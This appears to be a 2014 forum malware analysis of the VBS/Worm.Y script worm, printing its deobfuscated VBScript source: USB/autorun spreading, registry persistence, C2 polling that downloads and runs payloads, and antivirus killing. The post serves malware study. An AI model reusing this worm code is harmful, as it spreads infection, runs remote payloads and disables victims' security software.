
[原创]VBS/Worm.Y简单分析

2014-4-29 15:14
9032

之前没接触过VB,看了2天,死了好多脑细胞...终于把它解出来了,拿出来和大家分享一下。菜文没什么水平,新手可以看一下,共同进步

病毒名称:.vbs
病毒类型: VBS/Worm.Y
MD5: 64ea1c0e8f653984f0fde25b77f8494f

此病毒是VBS脚本病毒,多重加密,通过U盘进行传播感染,设置注册表自启动,每过一段时间运行,通过设置特定条件,进行其他恶意行为。网上下载其他恶意程序并执行。破坏系统隐藏属性。

附件密码:vbs

VBS病毒分析

病毒名称:.vbs

MD5: 64ea1c0e8f653984f0fde25b77f8494f

此病毒是VBS脚本病毒,多重加密,通过U盘进行传播感染,设置注册表自启动,每过一段时间运行,通过设置特定条件,进行其他恶意行为。网上下载其他恶意程序并执行。破坏系统隐藏属性。

整理一下主体代码:

' ---- top-level script: constants, environment discovery, dispatch ----
' Note: the worm runs with "on error resume next" inside every function and never declares
' variables; several names used below (rn, hl, er, uc, ub, nec) are not defined anywhere in
' this listing and presumably come from the stripped obfuscation layers — confirm against the sample.
j="\"                                   ' path separator appended to folder names below
:til="SY"                               ' marker line written at the top of autorun.inf (first line of inc)
:btj=900:                               ' initial value of the "tjs" counter kept in the registry
vs=".vbs"                               ' extension of the dropped plain-text copies
:ve=".vbe"                              ' extension of the copies dropped into the system folders
:cm="%comspec% /c "                     ' cmd
:dfo="/u#t/"                            ' URL path fragment used by gt when fetching update/payload files
:inf="\autorun.inf"                     ' autorun file planted on drives



set ws=createobject("wscript.shell"):
set fso=createobject("scripting.filesystemobject")
set wmi=getobject("winmgmts:\\.\root\cimv2"):
set sis=wmi.execquery("select * from win32_operatingsystem")
set dc=fso.drives:
' the worm relies on "at" jobs later (cu, dw), so it checks the Task Scheduler
' service ("Schedule") and starts it if it is stopped
set ats=wmi.execquery("select * from win32_service where name='Schedule'")
for each atc in ats:
	cat=atc.state:
	next:

if cat="Stopped" then ws.run "net start ""task scheduler""",0,false
        ouw=wscript.scriptfullname:		'scriptfullname
win=fso.getspecialfolder(0)&j:			'C:\WINDOWS
dir=fso.getspecialfolder(1)&j			    'C:\WINDOWS\system32
tmp=fso.getspecialfolder(2)&j:			'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
wbe=dir&"wbem\":
mir=left(ouw,len(ouw)-len(wscript.scriptname))    ' folder the running copy lives in
cnr="\computername":
cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr:
cna=rr(cnp,0):                          ' computer name; reused as the per-host registry key name (rpa, rsp)
if cna="" then cna=til
wsc="wscript.exe"
csc="cscript.exe"
css=csc&" //nologo "
' NOTE(review): rn is not defined in this listing; without it wsr is just
' ":createobject(""wscript.shell"").run" — verify against the original sample
wsr=rn&":createobject(""wscript.shell"").run"
c=vbcrlf

'-----------------inc------------------------
' inc = contents of the planted autorun.inf (lines joined with vbcrlf):
'SY'[autorun]
'open=wscript.exe .\.vbs'shell\open\command=wscript.exe .\.vbs
'shell\open\default=1
inc=til&c&"[autorun]"&c&"open="&wsc&" .\"&vs&c&"shell\open\command="&wsc&" .\"&vs&c&"shell\open\default=1"
'-----------------inc------------------------

sf="shell folders\":
rop="\software\microsoft\windows\currentversion\explorer\":
dap=rr("HKCU"&rop&sf&"desktop",0)&j		'C:\Documents and Settings\Administrator\Desktop\
rpa="HKLM\software\"&cna&j:			'HKLM\software\QUBY-9B3768E839\
fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs:  'C:\Documents and Settings\All Users\Start Menu\Programs\Startup\.vbs
fap=rr("HKCU"&rop&sf&"favorites",0)&j		'C:\Documents and Settings\Administrator\Favorites\
' C2 URL pieces, decoded with ec() (each char code minus its 1-based position);
' the decoded values on the right are the post author's annotations
ht=ec("ivwt?56"):										'http://
ha=ec(":;9:7>5kw9"):									'996628.cn/
hb=hl&"1;<<=6x"&hl&"r;"								'|1;<<=6x|r;   (hl is not defined in this listing)
hc="0dwuEpE":										'0dwuEpE
hd=ec("$"+hc):										'#.asp?i=
he=ec("c"+hc)											'b.asp?i=
rsp="HKLM\software\microsoft\windows\currentversion\"
rsb=rsp&"run\":rsp=rsp&"policies\explorer\run\"&cna   ' rsb: ...\run\ ; rsp: ...\policies\explorer\run\<computername>
hip="HKCU"&rop&"advanced\showsuperhidden"            ' Explorer "show super hidden files" switch
sz=lcase(fso.getfilename(wscript.fullname))          ' host interpreter: wscript.exe or cscript.exe

if mir=dir then sys=true                 ' sys: running from system32
for each si in sis:
	ca=si.caption:
	cs=si.codeset:
	cc=si.countrycode:
	os=si.oslanguage:
	wv=si.version:
next
' choose the hb host prefix and the lb tag from the OS: NT 5.2 -> "w"/"v",
' non-Chinese locale (oslanguage 2052 = zh-CN, countrycode 86) -> "p"/"o", else "d"/"c".
' lb is sent to the C2 as the "v=" parameter in gt.
if instr(wv,"5.2")<>0 then hb="w"+hb:lb="v" else if os<>2052 and cc<>86 then hb="p"+hb:lb="o" else hb="d"+hb:lb="c"
' if the running copy sits at a drive root (autorun launch), open that drive in Explorer
' (window style 3 = maximised) and remember it in bir
for each d in dc
	if mir=d&j then ws.run "explorer "&d,3,false:bir=true
next

' continue only when the script is at a drive root, in system32, in C:\WINDOWS or in wbem\;
' otherwise exit
if bir or sys or mir=win or mir=wbe then tir=true else wscript.quit


ouc=rt(ouw,-1):				'read own source
ver=gv(ouw):					'version check (last 8 chars of the first line, see gv)

' if the version check fails, show a "See You" box and run km 1 (uninstall);
' otherwise run km 0 — km is the main install/infection routine
if ver="" or not isnumeric(ver) then msgbox("See You!"):km 1 else km 0
if sys then 
' running from system32: make sure exactly one cscript-hosted instance is alive, then loop in cu
if sz=wsc then pr csc,-1                 ' hosted by wscript.exe: kill cscript instances (pr with gs<0 terminates)
if pr(csc,2)=1 then wscript.quit          ' two or more cscript instances already -> quit
wscript.sleep 2000
if pr(csc,1)=0 then ws.run css&dir&ve,0,false:if pr(csc,1)=1 then wscript.quit
' first run on this host: initialise the registry counters under rpa
if rr("til",1)<>til then wr "til",til:wr "tjs",btj:wr "djs",date-1:wr "ded",0
' more than 50 days since "djs" (and not the "o" locale tag): set osw=4, which disables drive infection in cu
djs=rr("djs",1):if isdate(djs) and date-cdate(djs)>50 and lb<>"o" then wr "osw",4
' "atd"=1: delete every scheduled "at" job, then clear the flag
if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0
' if the file named by "dna" exists in %TEMP%, run it
le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le
cu:er 10                                  ' cu never returns normally; er is not defined in this listing
else
' not in system32: stage a .vbe copy into system32 and launch it under cscript
wscript.sleep 5000
' pr(...)=2 is pr's error path (WMI query failed); then quit if already seen today ("tjc"), else record today
if pr(wsc,2)=2 then:if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date
if pr(csc,1)<>1 or pr(wsc,1)=0 then bf dir&ve,ouc,7:ws.run css&dir&ve,0,false
end if
' NOTE(review): the four lines below repeat the location check, source/version read and km
' dispatch from above, then launch the .vbe copy once more; this looks like a paste artefact
' in the write-up rather than a second execution path — confirm against the sample
if bir or sys or mir=win or mir=wbe then tir=true else wscript.quit
ouc=rt(ouw,-1):				'read own source
ver=gv(ouw):					'version check
if ver="" or not isnumeric(ver) then msgbox("See You!"):km 1 else km 0
if pr(csc,1)=0 then ws.run css&dir&ve,0,false:

' km(sw): install / uninstall the worm's persistence.
'   sw = 1  : remove everything (startup-folder copy, run keys, drive copies, own file, .vbe copies) and quit
'   sw = -1 : write nec to system32\.vbs and run it (nec is not defined in this listing)
'   else    : (re)install — hide super-hidden files, mark own file r/h/s, refresh the .vbe copies, set the run key
' Reads the globals rsp, rpa, fsp, ouw, win, dir, wbe, ve, vs, ouc, ver, hip, wsr.
function km(sw):
on error resume next
'rsp=HKLM\software\microsoft\windows\currentversion\policies\explorer\run\QUBY-9B3768E839
'rpa=HKLM\software\QUBY-9B3768E839\
'win&ve=C:\WINDOWS\.vbe
'wbe&ve=C:\WINDOWS\system32\wbem\.vbe
'dir&vs=C:\WINDOWS\system32\.vbs
' sw=1: delete every dropped file and registry entry, then exit
if sw=1 then
df fsp:wr rsp,-1:wr rpa,-1:us -1:df ouw:df win&ve:df dir&ve:df wbe&ve:wscript.quit
elseif sw=-1 then
bf dir&vs,nec,7:ws.run dir&vs
else
'hip=HKCU\software\microsoft\windows\currentversion\explorer\advanced\showsuperhidden	
' turn off "show super hidden files" in Explorer, then set attributes 7 (read-only+hidden+system) on own file
ws.regwrite hip,"0","REG_DWORD":ar ouw,7
' rewrite the system32 and wbem .vbe copies whenever their embedded version differs from ours
if gv(dir&ve)<>ver then bf dir&ve,ouc,7
' NOTE(review): the two msgbox calls showing the drop paths look like analyst debug output rather than worm behaviour — confirm
msgbox dir&ve
if gv(wbe&ve)<>ver then bf wbe&ve,ouc,7
msgbox wbe&ve
' persistence: policies\explorer\run value naming the .vbe; if it did not stick and there is no
' startup-folder launcher yet, drop a .vbs launcher there, otherwise remove that launcher
if rr(rsp,0)<>ve then ws.regwrite rsp,ve,"REG_SZ"
if rr(rsp,0)<>ve and not ei(fsp,1) then bf fsp,wsr&" """&ve&"""",0 else df fsp
end if
end function:
' cu(): resident main loop — infect drives, re-assert persistence, poll the C2, kill Task Manager.
'   every 5 s  : us 1 copies the payload and autorun.inf to drives (unless done today or "osw"=4)
'   every 20 s : km 0; on even minutes gt (once per minute, until it has returned 1);
'                if "tsw"=1, execute the script stored in "tco" (uc is not defined in this listing)
'   each tick  : if taskmgr.exe is running, schedule the .vbe as an interactive "at" job, set "atd"=1,
'                re-install and quit
function cu():
on error resume next
' infect drives at most once per day ("tgs") and not when the server set "osw"=4
dcu=rr("tgs",1)<>cstr(date) and rr("osw",1)<>4
do
sec=second(time):if (sec mod 5)=0 then if dcu then us 1 ' us 1: copy payload to drives
if (sec mod 20)=0 then
km 0
min=minute(now):if (min mod 2)=0 and nn<>min and oo<>1 then nn=min:oo=gt 
'gt: fetch the command file from the C2, act on it and update the registry values

if rr("tsw",1)=1 then execute(uc(rr("tco",1)))
end if
wscript.sleep 999
' once Explorer's "showsuperhidden" reads 1, mark today done and remove the drive copies (us -1)
if rr(hip,0)=1 and dcu then wr "tgs",date:us -1:dcu=false
' Task Manager running: re-launch the .vbe via an "at" job a few minutes from now and exit
if pr("taskmgr.exe",1)=1 then:ws.run "at "&time+0.003&" /interactive "&ve,0,false:wr "atd",1:km 0:wscript.quit
loop:cu   ' the do...loop has no exit condition; the trailing cu is only reached if the loop is left
:end function
' us(sw): act on every network drive (drivetype 3) and removable drive (drivetype 1, except A:/B:).
'   sw = 1  : plant autorun.inf (contents inc) plus a copy of own source as <drive>\.vbs, unless an
'             autorun.inf whose first line is til is already present together with the .vbs copy
'   sw = -1 : delete autorun.inf and the .vbs copy
'   else    : replace the .vbs copy with a launcher that runs the drive root via wscript.shell,
'             padded with 10000 apostrophes, and delete autorun.inf
function us(sw):
on error resume next
' drivetype 3 = network drive, 1 = removable (A: and B: skipped)
for each d in dc
if d.drivetype=3 or (d.drivetype=1 and d<>"A:" and d<> "B:") then
if sw=1 then
' a folder named autorun.inf would block the file: remove it first (ei(...,2) = folder test)
if ei(d&inf,2) then df d&inf
' copy the worm and autorun.inf to the drive
if ei(d&j&vs,1) and ei(d&inf,1) then
if rt(d&inf,1)<>til then bf d&inf,inc,7:bf d&j&vs,ouc,7
else
bf d&inf,inc,7:bf d&j&vs,ouc,7
end if
elseif sw=-1 then:df d&inf:df d&j&vs
else:bf d&j&vs,wsr&"(left(wscript.scriptfullname,3)),3"&string(10000,"'"),7:df d&inf
end if
end if
next
end function:
' rr(rna,pa): read a registry value; pa=1 prefixes the worm's own key rpa. Returns 0 on error.
function rr(rna,pa):
on error resume next
'rpa -> HKLM\software\QUBY-9B3768E839\
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0   ' er is not defined in this listing; presumably tests/clears Err — confirm
end function:
' wr(rna,rda): rda=-1 deletes the key/value named rna verbatim; otherwise writes rda as REG_SZ under rpa&rna.
function wr(rna,rda):
on error resume next
if rda=-1 then ws.regdelete rna else ws.regwrite rpa&rna,rda,"REG_SZ"
end function:
' bf(wh,wt,da): delete then recreate file wh with text wt and set its attributes to da; returns 1 when no error was raised.
function bf(wh,wt,da):
on error resume next
df wh:set i=fso.createtextfile(wh,true):i.write wt:i.close:ar wh,da:if not er(0) then bf=1
end function:
' df(wh): clear attributes, then delete wh whether file or folder; falls back to "rd /s /q" if the folder survives.
function df(wh)
on error resume next
ar wh,0:if ei(wh,1) then fso.deletefile(wh)
if ei(wh,2) then fso.deletefolder(wh):if ei(wh,2) then ws.run cm&"rd /s /q "&wh,0,false
end function
' ar(fi,cg): set the attribute bits of file or folder fi to cg (7 = read-only+hidden+system, 0 = normal).
function ar(fi,cg):
on error resume next
if ei(fi,1) then:set ofi=fso.getfile(fi):ofi.attributes=cg:set ofi=nothing
if ei(fi,2) then:set ofi=fso.getfolder(fi):ofi.attributes=cg:set ofi=nothing
end function:
' ei(na,wt): existence test; wt=1 -> file, wt=2 -> folder. Leaves the result Empty (falsy) when not found.
function ei(na,wt):
on error resume next
if fso.fileexists(na) and wt=1 then ei=true
if fso.folderexists(na) and wt=2 then ei=true
end function:
' pr(pcs,gs): process probe / killer via WMI Win32_Process.
'   returns 1 when at least |gs| processes named pcs exist, 0 otherwise, 2 when the query raised an error
'   gs < 0 additionally calls Terminate on each match; if Terminate returns 2 (access denied) and the
'   count threshold was met, it retries with "taskkill /f /im" and "tskill"
function pr(pcs,gs)
on error resume next
set pl=wmi.execquery("select * from win32_process where name='"&pcs&"'")
i=1:pr=0:for each p in pl:i=i+1
if i>abs(gs) then pr=1
if gs<0 then if p.terminate=2 and pr=1 then ws.run cm&"taskkill /f /im "&pcs&"&tskill "&left(p.name,len(p.name)-4),0,false
next
if er(0) then pr=2
end function:
' ec(wt): string decoder — subtract each character's 1-based position from its char code
'   (e.g. ec("ivwt?56") = "http://", as annotated at the top of the script).
function ec(wt):
on error resume next
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
end function:
' rt(wh,li): read file wh. li<0 returns the whole file; li>0 returns line number li, or 0 when the
'   file is shorter than li lines. Result stays Empty when the file does not exist.
function rt(wh,li):
on error resume next
if ei(wh,1) then
set r=fso.opentextfile(wh,1)
if li<0 then
rt=r.readall
else
' read and discard lines until line li is reached
i=0:do while i<li
i=i+1
if not r.atendofstream then
rt=r.readline
else
rt=0
end if
loop
end if
r.close
end if
end function:
' dw(pc,fn,fu,ki): download ht&fu into %TEMP%\fn and run it, once per base name (tracked in the
'   "ged" registry value) and only while process pc is running. Before downloading it tries to
'   stop 360tray.exe and kwatch.exe and, if avp.exe is running, turns the clock back one year for
'   ~10 s with an "at" job to restore it. ki=1 kills pc before running the file; ki=2 runs km 1
'   (self-removal) after a successful run. dw=1 when the download branch was taken.
'   NOTE(review): dw is not called anywhere in this listing.
function dw(pc,fn,fu,ki):
on error resume next
ged=fso.getbasename(fn)
if instr(rr("ged",1),ged)=0 and pr(pc,1)<>0 then
' if 360tray.exe was terminated, delete the rsb run entry and wait
if pr("360tray.exe",-1)=1 then wr rsb,-1:wscript.sleep 5000
' Kingsoft (kwatch.exe)
if pr("kwatch.exe",-1)=1 then wscript.sleep 5000
' after 2007 and with avp.exe running:
if year(Date)>2007 and pr("avp.exe",1)=1 then
ndate=date
' set the system date back one year
ws.run cm&"date "&date-365,0,false
wscript.sleep 10000
' then restore it through a scheduled "at" job
ws.run cm&"at "&time+0.005&" "&cm&"date "&ndate,0,false
end if
dwc=dn(tmp&fn,ht&fu,0,2000)
if ei(tmp&fn,1) and dwc=1 then
if ki=1 then pr pc,-1
ws.run tmp&fn
' on success, record the base name in "ged" and send a report request ("b.asp?i=<name>") to the C2
if not er(0) then wr "ged",ged&","&rr("ged",1):dn 0,ht+ec(hb)+he+ged,0,0:if ki=2 then km 1
end if
dw=1
end if
wscript.sleep 500
end function:
' dn(loc,web,ris,min): synchronous HTTP GET of web via Microsoft.XMLHTTP.
'   min=0 : request only, nothing is saved (used as a beacon)
'   min>0 : save the response body to loc with ADODB.Stream; dn=1 and loc is marked r/h/s when
'           its size exceeds min bytes (ris=1 also runs it); otherwise loc is deleted and dn=0
function dn(loc,web,ris,min):
on error resume next
set xp=createobject("microsoft.xmlhttp"):xp.open "get",web,0:xp.send()
if min<>0 then
if not er(0) then
' binary stream (type=1), overwrite on save (2)
df loc:set sget=createobject("adodb.stream") 
sget.mode=3:sget.type=1:sget.open():sget.write(xp.responsebody):sget.savetofile loc,2
if ei(loc,1) then fsz=fso.getfile(loc).size else fsz=0
if fsz>min then
dn=1:ar loc,7:if ris=1 then ws.run loc
else
dn=0:df loc
end if
end if
end if
end function
' gt(): poll the C2 for a command file.
'   Throttling: "tjs" (attempt counter) and "djs" (last poll date) live in the registry; polling
'   happens once tjs > 1000 (or an internet-cafe management process is present) and not yet today;
'   a djs older than 5 days forces tjs=1000. After a random delay of up to 120 s it requests
'   "#.asp?i=<id>&v=<lb><ver>" alternately from the ec(hb) host and the ha host (4 tries) into
'   mir&til, expecting the first line "<script>". gt=1 when a download succeeded.
'   Command file lines: cin, dis, dna, dfr, nve, nru, nna, nfr, tsw, tco, osw, idd.
'   nve newer than ver (or no .vbe copy) -> fetch nna as the new .vbe and quit;
'   dis=1 -> download dfr as %TEMP%\dna and run it; dis=2 -> execute uc(dfr) (uc is not defined here).
function gt():
on error resume next
tjs=rr("tjs",1):djs=rr("djs",1):if not isnumeric(tjs) or not isdate(djs) then wr "tjs",1:wr "djs",date:djs=rr("djs",1)
' author: "kill the internet-cafe management programs"; note pr is called with gs=1 here, which only
' tests for clsmn.exe / ap.exe / pubwin.exe (wb) — no termination happens in this function
wr "tjs",tjs+1:wb=pr("clsmn.exe",1)=1 or pr("ap.exe",1)=1 or pr("pubwin.exe",1)=1
if date-cdate(djs)>5 then wr "tjs",1000:wr "djs",date-1
if (rr("tjs",1)>1000 or wb) and rr("djs",1)<>cstr(date) then
id=rr("idd",1):if wb then id=1
' random delay of 1..120000 ms before contacting the server
randomize:wscript.sleep int(rnd*(120000-1+1))+1
' up to four attempts, alternating between the two hosts, until the first line is "<script>"
js=1:cd=0:do while cd<>"<script>"
if js=2 or js=4 then d2=dn(mir&til,ht+ha+hd&id&"&v="&lb&ver,0,100):cd=rt(mir&til,1)
if js=1 or js=3 then d1=dn(mir&til,ht+ec(hb)+hd&id&"&v="&lb&ver,0,100):cd=rt(mir&til,1)
js=js+1:if js>4 then
if d1=1 or d2=1 then gt=1 else wr "tjs",tjs-10:er -1
exit do
end if:loop
if ei(mir&til,1) then
set r=fso.opentextfile(mir&til,1)
cin=r.readline:dis=r.readline:dna=r.readline:dfr=r.readline:nve=r.readline:nru=r.readline
nna=r.readline:nfr=r.readline:tsw=r.readline:tco=r.readline:osw=r.readline:idd=r.readline
r.close:df mir&til:if cin="<script>" then
' store the received configuration under rpa
wr "tjs",1:wr "djs",date:wr "idd",idd:wr "dna",dna:wr "tsw",tsw:wr "tco",tco:wr "osw",osw
if ver-nve<0 or not ei(dir&ve,1) then dn dir&nna,ht&nfr&dfo&nna,nru,2000:wscript.quit
if dis=1 then if dna<>le or not ei(tmp&le,1) then df tmp&le:dn tmp&dna,ht&dfr&dfo&dna,1,1000
if dis=2 then execute(uc(dfr))
end if
end if
end if
end function:
' gv(wh): version stamp of a dropped copy — the last 8 characters of its first line, if they form
'   a hex number, passed through ub (ub is not defined in this listing). Result stays Empty otherwise.
:function gv(wh):
on error resume next
ves=rt(wh,1):if len(ves)>8 then ves=mid(ves,len(ves)-7,8):if isnumeric("&h"&ves) then gv=ub(ves)
end function:
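' hook_execute(x): analysis hook that stands in for execute() — logs every script string
' the sample hands to execute() before running it, so decoded stages can be recovered.
'   x - VBScript source text to run
' Side effects: appends x plus CRLF to ok.txt in the current directory, then executes x.
' The original had one branch for "file exists" (open for append) and one for "file
' missing" (create); opentextfile with ForAppending (8) and create=true covers both, so
' the duplicated write/close/execute sequence is collapsed into a single path.
' No "on error resume next": if the log cannot be written the error propagates and x
' is NOT executed, which is the safer failure mode for an analysis run.
sub hook_execute(x)
'wscript.echo x
outfile="ok.txt"
set fso=createobject("Scripting.FileSystemObject")
' 8 = ForAppending, create=true, format 0 = ASCII (same encoding as the original createtextfile call)
set objtxt=fso.opentextfile(outfile,8,true,0)
objtxt.write x&vbcrlf
objtxt.close
execute x
end sub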


同是新手,赞一个~
2014-4-29 15:46
2天学会VB,楼主值得鼓励,共勉。~
2014-4-29 16:02